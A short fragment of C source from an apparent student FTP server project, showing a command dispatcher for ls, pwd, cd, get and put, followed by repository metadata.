line[i] = ' ';
i++;
}
}
void read_commands(t_server *serv)
{
if (ft_strcmp(serv->split_line[0], "ls") == 0)
exec_ls(serv);
else if (ft_strcmp(serv->split_line[0], "pwd") == 0)
exec_pwd(serv);
else if (ft_strcmp(serv->split_line[0], "cd") == 0)
{
serv->state = OK;
serv->envy = ft_cd(serv->split_line[1], serv->envy);
}
else if (ft_strcmp(serv->split_line[0], "get") == 0)
ft_get(serv);
else if (ft_strcmp(serv->split_line[0], "put") == 0)
ft_put(serv);
else
ft_putendl("Command not found");
}
|
62f31b9afa7c649e90d4f509eb5c1557a131273d
|
[
"C",
"Makefile"
] | 12
|
C
|
Lumpouille/FTP
|
589096384f4c5c844b42c2dac97548e165bc2c32
|
63c9816a082a76a7f97ddd246f759dbf52b00cf3
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.